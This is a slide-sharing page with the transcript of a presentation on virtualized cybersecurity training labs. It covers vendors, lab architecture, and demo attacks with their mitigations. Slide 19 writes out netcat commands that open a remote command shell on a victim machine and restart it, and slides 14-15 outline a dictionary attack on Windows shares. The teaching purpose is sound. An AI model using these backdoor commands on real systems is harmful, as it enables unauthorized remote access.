Download
cybersecurity training in a virtual environment by c hinedum irrechukwu n.
Skip this Video
Loading SlideShow in 5 Seconds..
Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu PowerPoint Presentation
Download Presentation
Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu

Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu

198 Vues Download Presentation
Télécharger la présentation

Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Cybersecurity Training in a Virtual EnvironmentBy ChinedumIrrechukwu

  2. Areas to be covered • Brief introduction to virtualization • General Benefits of virtualization • Dominant vendors and common products • Lab Architecture • Lab technical support • Lab Exercise Demonstration • Summary • Questions

  3. Introduction to Virtualization • A software entity can have and share access to underlying hardware resources. • The software entity can be an application, a network or a virtual machine. • Humans can interact with it as if it is a separate entity (e.g a separate physical machine) • A software layer exists that allows for the creation and deployment of virtual machines

  4. General Benefits • Multiple guest operating systems can exist on one physical machine • More productivity and less cost • Additional energy and real estate cost savings • Software testing before deployment (patches) • Fast restore in the event of VM crash or corruption

  5. Dominant Vendors and Common Products • Vmware • VSphere, Esxi, Vcloud Director • Citrix (Xen) • Xen is open source • Citrix version has an excellent management interface • Alternative choice to the VMware product line • Linux Kernel Virtual Machine • High potential but no well developed management interface

  6. Common Products for Single Users • Enterprise class virtualization products • Vmware, Citrix Xen and Linux KVM can • Create multiple virtual networks • Allow numerous connections to the servers • Allow the clustering of servers and provide a good management interface • Provide a way to authenticate users • Common Products for Single users • Vmware workstation, Vmware player etc • Oracle Virtualbox • Virtual PC

  7. Lab Architecture • Consists of multiple physical servers • Group of servers is managed by a central server • Central server should have ability to connect into an authentication server • VPN might be needed for security • Choice between web based connection to VM or IP based remote connection (RDP or SSH).

  8. Lab Architecture Diagram http://www.cisco.com/en/US/solutions/collateral/ns340/ns517/ns224/ns668/net_implementation_white_paper0900aecd8053495a.html

  9. Extra Notes on Lab Architecture • The number of physical servers should depend on the number of students and the storage you need • Cost increases with each additional server you add • Consider the technical support required for the system

  10. Lab Support • Lab may require additional technical support from IT staff • Both Instructors and students may need help with connectivity • Students may require help with lab exercises • Consider having IT staff help with this area • Consider hiring teaching assistants or lab assistants to help with lab exercises

  11. Potential Technical Issues • VPN Connectivity • Installed Firewall on client PCs • Installed Internet Security (Antivirus)software on client PCs • User Based Issues • Inexperienced users • Incorrectly applied instructions

  12. Attacks • Online password attack (Windows) • Attempt to crack a password on a remote system • Victim will be a windows system • Backdoor attack • Insider installed malicious program that allows connections to be made to victim system • Trojan attack • Malicious program that appears harmless but performs some other action

  13. Online Password Attack (Windows) • Server Message Block used for file sharing • SMB clients and servers communicate about shared resources http://www.highteck.net/EN/Application/Application_Layer_Functionality_and_Protocols.html

  14. Online Password Attack (Contd) • Attacker’s Objective • Retrieve or discover a privileged user’s password • Attack Method • Automate a dictionary password attack against a Windows share • A custom script can and will be used • Mitigation/Prevention/Detection • Apply maximum logon attempts • Security personnel should review log files

  15. Online Password Attack Contd. (Demo) • Nmap scan of network • Enumerate shares of the Windows machines • Run script that attempts to connect to share with a privileged account • Connection attempt will use multiple dictionary passwords • Connect to the VM using a terminal application

  16. Online Password Attack on a Windows (Contd.) • Learning Objectives • Importance of using a complex password • Importance of enforcing maximum logon attempts • Importance of renaming the administrator account • Understanding the effectiveness of social engineering • Knowing the username is half the battle • Aha moment! http://quite-rightly.blogspot.com/2011/07/congress-let-there-be-edison-light-bulb.html

  17. Backdoor Attack • Attacker’s objective • Execute remote commands on victim system • Attack Method • Insider installs backdoor program on a victim machine • Backdoor listens for and accepts incoming connections http://technicaljones.com/index.php?page=91

  18. Backdoor Attack Contd. • Mitigation/Prevention/Detection • Physical security reduces the risk • Anti-virus scans are also effective http://kyrionhackingtutorials.com/2010/10/what-are-backdoors/

  19. Backdoor Attack Steps • Install backdoor (netcat) on victim computer • Configure backdoor to accept incoming connections • Execute “nc –l –v –p 5555 –e cmd.exe” on server or victim • Connect to the victim machine • Execute “nc –vn <IP address> 5555” • Execute command on remote system from attack machine • Execute “shutdown –r –t 20” to shut down and restart the victim system in 20 seconds

  20. Trojan Attack • Attacker’s Objective • Successfully install or execute malware on a victim system • Trojan installs malware but pretends to be legitimate software http://www.buzzle.com/articles/trojan-horse-virus-removal.html

  21. Trojan Attack (Contd.) • Attack Method • Malicious web downloads • Email Attachments • Mitigation/Prevention/Detection • Up to date anti-virus definitions • User training

  22. Take Home Message • Virtualization is useful for hands-on exercises. • Provides flexibility to create different lab environments • Cost is proportional to the number of students using the lab • Lab support is useful and should be considered • Virtual labs help instructors to achieve learning objectives and improve experiential learning.

  23. Questions • Any questions ??? • Email: chinedum.irrechukwu@umuc.edu